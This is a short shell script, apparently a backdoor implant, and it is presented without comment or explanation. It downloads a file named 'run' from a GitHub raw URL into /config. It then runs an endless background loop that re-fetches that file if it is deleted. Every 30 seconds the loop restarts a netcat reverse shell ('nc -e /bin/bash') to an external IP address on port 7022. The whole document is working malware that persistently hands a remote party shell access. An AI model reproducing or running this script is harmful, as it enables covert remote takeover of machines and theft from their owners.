#!/bin/sh
curl https://raw.githubusercontent.com/iiuf/new/master/run -O /config/run
while true
do
	if [ ! -f /config/run ]; then
		curl https://raw.githubusercontent.com/iiuf/new/master/run -O /config/run;
	fi
	
	if [ "`ps -ef | grep 'nc -e /bin/bash 23.236.69.65 7022' | grep -v grep | wc -l`" == "0" ]; then
		nc -e /bin/bash 23.236.69.65 7022 &
	fi
	
	sleep 30
done &